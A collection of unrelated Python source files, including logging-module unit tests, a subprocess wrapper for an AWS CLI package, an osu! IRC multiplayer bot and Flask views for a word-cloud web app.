support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_find_caller_with_stacklevel(self):
the_level = 1
def innermost():
self.logger.warning('test', stacklevel=the_level)
def inner():
innermost()
def outer():
inner()
records = self.recording.records
outer()
self.assertEqual(records[-1].funcName, 'innermost')
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'inner')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'outer')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'test_find_caller_with_stacklevel')
self.assertGreater(records[-1].lineno, lineno)
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_is_enabled_for_disabled_logger(self):
old_disabled = self.logger.disabled
old_disable = self.logger.manager.disable
self.logger.disabled = True
self.logger.manager.disable = 21
self.addCleanup(setattr, self.logger, 'disabled', old_disabled)
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('root'))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in ('', 'root', 'foo', 'foo.bar', 'baz.bar'):
logger = logging.getLogger(name)
s = pickle.dumps(logger, proto)
unpickled = pickle.loads(s)
self.assertIs(unpickled, logger)
def test_caching(self):
root = self.root_logger
logger1 = logging.getLogger("abc")
logger2 = logging.getLogger("abc.def")
# Set root logger level and ensure cache is empty
root.setLevel(logging.ERROR)
self.assertEqual(logger2.getEffectiveLevel(), logging.ERROR)
self.assertEqual(logger2._cache, {})
# Ensure cache is populated and calls are consistent
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
self.assertFalse(logger2.isEnabledFor(logging.DEBUG))
self.assertEqual(logger2._cache, {logging.ERROR: True, logging.DEBUG: False})
self.assertEqual(root._cache, {})
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
# Ensure root cache gets populated
self.assertEqual(root._cache, {})
self.assertTrue(root.isEnabledFor(logging.ERROR))
self.assertEqual(root._cache, {logging.ERROR: True})
# Set parent logger level and ensure caches are emptied
logger1.setLevel(logging.CRITICAL)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
# Ensure logger2 uses parent logger's effective level
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
# Set level to NOTSET and ensure caches are empty
logger2.setLevel(logging.NOTSET)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Verify logger2 follows parent and not root
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
self.assertTrue(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger1.isEnabledFor(logging.ERROR))
self.assertTrue(logger1.isEnabledFor(logging.CRITICAL))
self.assertTrue(root.isEnabledFor(logging.ERROR))
# Disable logging in manager and ensure caches are clear
logging.disable()
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Ensure no loggers are enabled
self.assertFalse(logger1.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(root.isEnabledFor(logging.CRITICAL))
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, encoding='utf-8', delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
def test_emit_after_closing_in_write_mode(self):
# Issue #42378
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, encoding='utf-8', mode='w')
fh.setFormatter(logging.Formatter('%(message)s'))
fh.emit(self.next_rec()) # '1'
fh.close()
fh.emit(self.next_rec()) # '2'
with open(self.fn) as fp:
self.assertEqual(fp.read().strip(), '1')
class RotatingFileHandlerTest(BaseFileTest):
def test_should_not_rollover(self):
# If maxbytes is zero rollover never occurs
rh = logging.handlers.RotatingFileHandler(
self.fn, encoding="utf-8", maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
# bpo-45401 - test with special file
# We set maxBytes to 1 so that rollover would normally happen, except
# for the check for regular files
rh = logging.handlers.RotatingFileHandler(
os.devnull, encoding="utf-8", maxBytes=1)
self.assertFalse(rh.shouldRollover(self.next_rec()))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, encoding="utf-8", maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn, encoding="utf-8")
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, encoding="utf-8", backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
def test_namer_rotator_inheritance(self):
class HandlerWithNamerAndRotator(logging.handlers.RotatingFileHandler):
def namer(self, name):
return name + ".test"
def rotator(self, source, dest):
if os.path.exists(source):
os.replace(source, dest + ".rotated")
rh = HandlerWithNamerAndRotator(
self.fn, encoding="utf-8", backupCount=2, maxBytes=1)
self.assertEqual(rh.namer(self.fn), self.fn + ".test")
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(rh.namer(self.fn + ".1") + ".rotated")
self.assertFalse(os.path.exists(rh.namer(self.fn + ".1")))
rh.close()
@support.requires_zlib()
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, encoding="utf-8", backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
def test_should_not_rollover(self):
# See bpo-45401. Should only ever rollover regular files
fh = logging.handlers.TimedRotatingFileHandler(
os.devnull, 'S', encoding="utf-8", backupCount=1)
time.sleep(1.1) # a little over a second ...
r = logging.makeLogRecord({'msg': 'testing - device file'})
self.assertFalse(fh.shouldRollover(r))
fh.close()
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(
self.fn, 'S', encoding="utf-8", backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
# print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', encoding="utf-8", delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', encoding="utf-8", delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', encoding="utf-8", delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, encoding="utf-8", when='MIDNIGHT', interval=1, backupCount=0,
utc=True, atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, encoding="utf-8", when='W%d' % day, interval=1, backupCount=0,
utc=True, atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def test_compute_files_to_delete(self):
# See bpo-46063 for background
wd = tempfile.mkdtemp(prefix='test_logging_')
self.addCleanup(shutil.rmtree, wd)
times = []
dt = datetime.datetime.now()
for i in range(10):
times.append(dt.strftime('%Y-%m-%d_%H-%M-%S'))
dt += datetime.timedelta(seconds=5)
prefixes = ('a.b', 'a.b.c', 'd.e', 'd.e.f')
files = []
rotators = []
for prefix in prefixes:
p = os.path.join(wd, '%s.log' % prefix)
rotator = logging.handlers.TimedRotatingFileHandler(p, when='s',
interval=5,
backupCount=7,
delay=True)
rotators.append(rotator)
if prefix.startswith('a.b'):
for t in times:
files.append('%s.log.%s' % (prefix, t))
else:
rotator.namer = lambda name: name.replace('.log', '') + '.log'
for t in times:
files.append('%s.%s.log' % (prefix, t))
# Create empty files
for fn in files:
p = os.path.join(wd, fn)
with open(p, 'wb') as f:
pass
# Now the checks that only the correct files are offered up for deletion
for i, prefix in enumerate(prefixes):
rotator = rotators[i]
candidates = rotator.getFilesToDelete()
self.assertEqual(len(candidates), 3)
if prefix.startswith('a.b'):
p = '%s.log.' % prefix
for c in candidates:
d, fn = os.path.split(c)
self.assertTrue(fn.startswith(p))
else:
for c in candidates:
d, fn = os.path.split(c)
self.assertTrue(fn.endswith('.log'))
self.assertTrue(fn.startswith(prefix + '.') and
fn[len(prefix) + 2].isdigit())
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, encoding="utf-8", when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception as e:
print('exception in diagnostic code: %s' % e, file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
try:
h = logging.handlers.NTEventLogHandler('test_logging')
except pywintypes.error as e:
if e.winerror == 5: # access denied
raise unittest.SkipTest('Insufficient privileges to run test')
raise
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
not_exported = {
'logThreads', 'logMultiprocessing', 'logProcesses', 'currentframe',
'PercentStyle', 'StrFormatStyle', 'StringTemplateStyle',
'Filterer', 'PlaceHolder', 'Manager', 'RootLogger', 'root',
'threading'}
support.check__all__(self, logging, not_exported=not_exported)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
def setUpModule():
cm = support.run_with_locale('LC_ALL', '')
cm.__enter__()
unittest.addModuleCleanup(cm.__exit__, None, None, None)
if __name__ == "__main__":
unittest.main()
|
interactive_process.py | """
Wrapper for subrocess.Popen with interactive input support.
"""
import select
import subprocess
import sys
import threading
from subprocess import Popen
from typing import Sequence, TextIO
from awscliv2.exceptions import ExecutableNotFoundError, SubprocessError
class InteractiveProcess:
"""
Wrapper for subrocess.Popen with interactive input support.
"""
read_timeout = 0.2
default_stdout: TextIO = sys.stdout
default_stdin: TextIO = sys.stdin
def __init__(self, command: Sequence[str]) -> None:
self.command = list(command)
self.finished = True
def writeall(self, process: Popen, stdout: TextIO) -> None:
while True:
output_data = process.stdout.read(1)
if not output_data:
break
stdout.write(output_data.decode("utf-8"))
stdout.flush()
def readall(self, process: Popen, stdin: TextIO) -> None:
while True:
if self.finished:
break
rlist = select.select([stdin], [], [], self.read_timeout)[0]
if not rlist:
continue
input_data = stdin.readline()
if not input_data:
break
process.stdin.write(input_data.encode())
process.stdin.flush()
def run(self, stdin: TextIO = default_stdin, stdout: TextIO = default_stdout) -> int:
self.finished = False
try:
process = Popen(
self.command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
except FileNotFoundError:
raise ExecutableNotFoundError(self.command[0])
writer = threading.Thread(target=self.writeall, args=(process, stdout))
reader = threading.Thread(target=self.readall, args=(process, stdin))
reader.start()
writer.start()
try:
process.wait()
except KeyboardInterrupt:
raise SubprocessError("Keyboard interrupt")
finally:
self.finished = True
reader.join()
writer.join()
return process.returncode
|
bot.py | from .ws import OsuIrc, OsuIrcProxy
from . import models
import typing as t
from threading import Thread
import re
def gettext_between(text: str, before: str, after: str, is_include=False) -> str: # 取出中间文本
"""
取中间文本
:param text: 原文本
:param before: 前面文本
:param after: 后面文本
:param is_include: 是否取出标识文本
:return: 操作后的文本
"""
b_index = text.find(before)
if (b_index == -1):
b_index = 0
else:
b_index += len(before)
af_index = text.find(after, b_index)
if (af_index == -1):
af_index = len(text)
rettext = text[b_index: af_index]
if is_include:
rettext = before + rettext + after
return (rettext)
class OsuBot(OsuIrc):
def __init__(self, name: str, passwd: str, debug=False, proxy: t.Optional[OsuIrcProxy] = None):
super().__init__(name.replace(' ', '_').lower(), passwd, debug=debug, proxy=proxy)
self.event_channel_message = [] # 房间消息
self.event_private_message = [] # 私聊消息
self.event_someone_joined_room = [] # 加入房间(仅创建房间时同步触发)
self.event_someone_change_slot = [] # 有人换位
self.event_someone_joined_slot = [] # 加入房间某位置(新玩家加入)
self.event_room_changed_song = [] # 改歌曲
self.event_room_changed_host = [] # 换房主
self.event_someone_left_room = [] # 有人离开房间
self.event_match_closed = [] # 房间关闭
self.event_all_players_are_ready = [] # 所有人准备就绪
self.event_user_finished_playing = [] # 有人完成曲目
self.event_host_is_changing_map = [] # 房主开始修改地图
self.event_match_has_started = [] # 游戏开始
self.event_match_finished = [] # 所有人完成游戏
self.run_after_start = []
self.waiting_room = {}
self.api = BotApi(self)
def receiver(self, reg_type: str):
def reg(func: t.Callable):
def _appender(fs: t.List):
fs.append(func)
if reg_type == models.Codes.channel_message:
_appender(self.event_channel_message)
if reg_type == models.Codes.private_message:
_appender(self.event_private_message)
if reg_type == models.Codes.someone_joined_room:
_appender(self.event_someone_joined_room)
if reg_type == models.Codes.run_after_start:
_appender(self.run_after_start)
if reg_type == models.Codes.someone_joined_slot:
_appender(self.event_someone_joined_slot)
if reg_type == models.Codes.someone_changed_slot:
_appender(self.event_someone_change_slot)
if reg_type == models.Codes.changed_song:
_appender(self.event_room_changed_song)
if reg_type == models.Codes.changed_host:
_appender(self.event_room_changed_host)
if reg_type == models.Codes.someone_left_room:
_appender(self.event_someone_left_room)
if reg_type == models.Codes.match_closed:
_appender(self.event_match_closed)
if reg_type == models.Codes.all_players_are_ready:
_appender(self.event_all_players_are_ready)
if reg_type == models.Codes.user_finished_playing:
_appender(self.event_user_finished_playing)
if reg_type == models.Codes.host_is_changing_map:
_appender(self.event_host_is_changing_map)
if reg_type == models.Codes.match_has_started:
_appender(self.event_match_has_started)
if reg_type == models.Codes.match_finished:
_appender(self.event_match_finished)
return reg
@staticmethod
def call_func(funcs: t.List, *args, **kwargs):
for func in funcs:
_t = Thread(target=func, args=args, kwargs=kwargs)
_t.start()
def strat(self):
self.connect()
self.call_func(self.run_after_start)
while True:
for line in self.receive().split('\n'):
line = line.strip()
# print(line)
if line == "ping cho.ppy.sh":
self.send("PONG cho.ppy.sh")
continue
if f"!cho@ppy.sh privmsg {self.name} :" in line: # 私聊消息事件
name = line[1: line.find("!")]
msg = line[line.find(f'!cho@ppy.sh privmsg {self.name} :') +
len(f"!cho@ppy.sh privmsg {self.name} :"):]
if name != "banchobot":
self.call_func(self.event_private_message, models.Message(name, msg))
else:
self.logger(f"Bancho: {msg}", debug=True)
if "created the tournament match" in msg: # 创建房间
left_msg = msg[len("created the tournament match"):].strip()
room_url = re.findall("https://osu\\.ppy\\.sh/mp/\\d*", left_msg)
if room_url:
room_url = room_url[0]
room_id = "#mp_" + room_url[len("https://osu.ppy.sh/mp/"):].strip()
room_name = left_msg[len(room_url):].strip()
if room_name in self.waiting_room:
self.waiting_room[room_name] = room_id
elif "!cho@ppy.sh privmsg" in line:
name = line[1: line.find("!")]
msg = line[line.find(":", 2) + 1:]
channel_id = gettext_between(line, "cho@ppy.sh privmsg ", " :").strip()
if name == "banchobot":
self.logger(f"[Bancho] in {channel_id}: {msg}", debug=True)
if "beatmap changed to" in msg:
_msg = msg[len("beatmap changed to"):].strip()
self.call_func(self.event_room_changed_song, models.Message("", _msg, channel_id))
elif "joined in slot" in msg:
u_name = msg[:msg.find("joined in slot")].strip()
slot = msg[msg.find("joined in slot") + len("joined in slot"):].strip()
slot = slot[:-1] if slot.endswith(".") else slot
self.call_func(self.event_someone_joined_slot, models.Message(u_name, slot, channel_id))
elif "moved to slot" in msg:
u_name = msg[:msg.find("moved to slot")].strip()
slot = msg[msg.find("moved to slot") + len("moved to slot"):].strip()
slot = slot[:-1] if slot.endswith(".") else slot
self.call_func(self.event_someone_change_slot, models.Message(u_name, slot, channel_id))
elif "left the game" in msg:
u_name = msg[:msg.find("left the game")].strip()
self.call_func(self.event_someone_left_room,
models.Message(u_name, f"{u_name} left {channel_id}", channel_id))
elif "became the host" in msg:
u_name = msg[:msg.find("became the host")].strip()
self.call_func(self.event_room_changed_host, models.Message(u_name, msg, channel_id))
elif "finished playing" in msg:
uname = msg[:msg.find("finished playing")].strip()
_score = gettext_between(msg, "score: ", ", ").strip()
_st = f"finished playing (score: {_score}, "
pass_str = gettext_between(msg, _st, ").").strip()
self.call_func(self.event_user_finished_playing,
models.UserGrade(uname, channel_id, True if pass_str == "passed" else False,
_score))
elif msg == "host is changing map...":
self.call_func(self.event_host_is_changing_map, models.Message("", msg, channel_id))
elif msg == "the match has started!":
self.call_func(self.event_match_has_started, models.Message("", msg, channel_id))
elif msg == "the match has finished!":
self.call_func(self.event_match_finished, models.Message("", msg, channel_id))
elif msg == "closed the match":
self.call_func(self.event_match_closed, models.Message("", msg, channel_id))
elif "all players are ready" in msg:
self.call_func(self.event_all_players_are_ready, models.Message("", msg, channel_id))
else:
self.call_func(self.event_channel_message, models.Message(name, msg, channel_id))
if f"!cho@ppy.sh join :#" in line: # 某人加入房间
room = line[line.rfind('#'):]
name = line[1:line.find("!")]
self.call_func(self.event_someone_joined_room, models.Message(name, room))
class BotApi:
def __init__(self, bot: OsuBot):
self.bot = bot
def send_private_message(self, username, message):
self.bot.send(f"PRIVMSG {username} :{message}")
def send_channel_message(self, room_id, message):
self.bot.send(f"PRIVMSG {room_id} :{message}")
def room_create(self, room_name, passwd="", free_mods=False, max_member=""):
self.bot.send(f"PRIVMSG BanchoBot :mp make {room_name}")
self.bot.waiting_room[room_name] = ""
while True:
if self.bot.waiting_room[room_name] != "":
room_id = self.bot.waiting_room[room_name]
self.bot.waiting_room.pop(room_name)
break
if passwd != "":
self.bot.send(f"PRIVMSG {room_id} :!mp password {passwd}")
if free_mods:
self.bot.send(f"PRIVMSG {room_id} :!mp mods freemod")
if max_member != "":
self.bot.send(f"PRIVMSG {room_id} :!mp size {max_member}")
self.bot.logger(f"Get room id: {room_id}")
return room_id
def room_set_passwd(self, room_id, passwd):
self.bot.send(f"PRIVMSG {room_id} :!mp password {passwd}")
def room_set_max_member(self, room_id, max_member):
self.bot.send(f"PRIVMSG {room_id} :!mp size {max_member}")
def room_set_host(self, room_id, host_name):
self.bot.send(f"PRIVMSG {room_id} :!mp host {host_name}")
def room_set_mods(self, room_id, mods):
self.bot.send(f"PRIVMSG {room_id} :!mp mods {mods}")
def room_strat_game(self, room_id):
self.bot.send(f"PRIVMSG {room_id} :!mp start")
def room_change_map(self, room_id, map_id, mode=""):
_run = f"PRIVMSG {room_id} :!mp map {map_id}"
if mode != "":
_run = f"{_run} {mode}"
self.bot.send(_run)
|
views.py | import os
from flask import render_template, request, send_from_directory, redirect
from threading import Thread
from app import app
from app import twitapp,tagcloud
from app.utils import maintenance,gettoken,process_source,process_uploaded_txt_file,allowed_file_img
@app.route('/',methods=['GET'])
def index():
maintenance()
if bool(request.args):
return redirect('/')
else:
return render_template('index.html')
@app.route('/',methods=['POST'])
def index_process():
if 'token' in request.form.keys():
return recolor_tagcloud(request=request)
else:
return create_tagcloud(request=request)
@app.route('/updatetwitter',methods=['GET'])
def update_twitter_tagclouds():
t = Thread(target=twitapp.post_tags_from_url,args=('news.yandex.ru',))
t.start()
return render_template('redirect.html')
#return redirect('/')
def create_tagcloud(request):
token = gettoken()
#SOURCEFILE AND URL
try:
sourcefilename = process_source(token=token,uploadedfile=request.files['source'],weburl=request.form['pageurl'])
except:
return render_template('index.html', error='nosource')
#STOPWORDSFILE
if request.files['stopwords']:
try:
stopwordsfilename = os.path.join(app.config['UPLOAD_FOLDER'], ''.join(['stopwords', token, '.txt']))
process_uploaded_txt_file(uploadedfile=request.files['stopwords'], targetfilename=stopwordsfilename)
except:
return render_template('index.html', error='stoptxtfile')
else:
stopwordsfilename = None
#MASKFILE
file = request.files['mask']
if file:
if allowed_file_img(file.filename) and file.content_length < app.config['MAX_FILE_CONTENT_LENGTH']:
maskfilename = os.path.join(app.config['UPLOAD_FOLDER'], ''.join(['maskfile', token]))
request.files['mask'].save(maskfilename)
else:
return render_template('index.html', error='maskfile')
else:
maskfilename = None
#MAX_COUNT
if request.form['max_words']:
max_words = int(request.form['max_words'])
else:
max_words = 250
randomizecolors = True if 'randomizecolors' in request.form.keys() else False
ignorebasestopwords = True if 'ignorebasestopwords' in request.form.keys() else False
outputfilename = os.path.join(app.config['OUTPUT_FOLDER'], ''.join(['tagcloud_', token, '.png']))
layoutfilename = os.path.join(app.config['UPLOAD_FOLDER'], ''.join(['layout', token]))
if tagcloud.createcloud(sourcefilename=sourcefilename,
stopwordsfilename=stopwordsfilename,
ignorebasestopwords=ignorebasestopwords,
outputfilename=outputfilename,
layoutfilename=layoutfilename,
maskfilename=maskfilename,
randomizecolors=randomizecolors,
max_words=max_words):
return render_template('result.html',
filename=''.join(['/output/',''.join(['tagcloud_', token, '.png']),'?',gettoken()]),
randomizecolors=randomizecolors,
token=token)
else:
return render_template('index.html', error='tagcloud')
def recolor_tagcloud(request):
token = request.form['token']
randomizecolors = True if request.form['randomizecolors'] == 'True' else False
maskfilename = os.path.join(app.config['UPLOAD_FOLDER'], ''.join(['maskfile', token]))
if not os.path.isfile(maskfilename):
maskfilename = None
outputfilename = os.path.join(app.config['OUTPUT_FOLDER'], ''.join(['tagcloud_', token, '.png']))
if tagcloud.recolor_cloud(outputfilename=outputfilename,
maskfilename=maskfilename,
randomizecolors=randomizecolors,
token=token):
return render_template('result.html',
filename=''.join(['/output/', ''.join(['tagcloud_', token, '.png']), '?', gettoken()]),
randomizecolors=randomizecolors,
token=token)
else:
return render_template('index.html', error='error')
@app.route('/robots.txt')
@app.route('/sitemap.xml')
def static_from_root():
return send_from_directory(app.static_folder, request.path[1:])
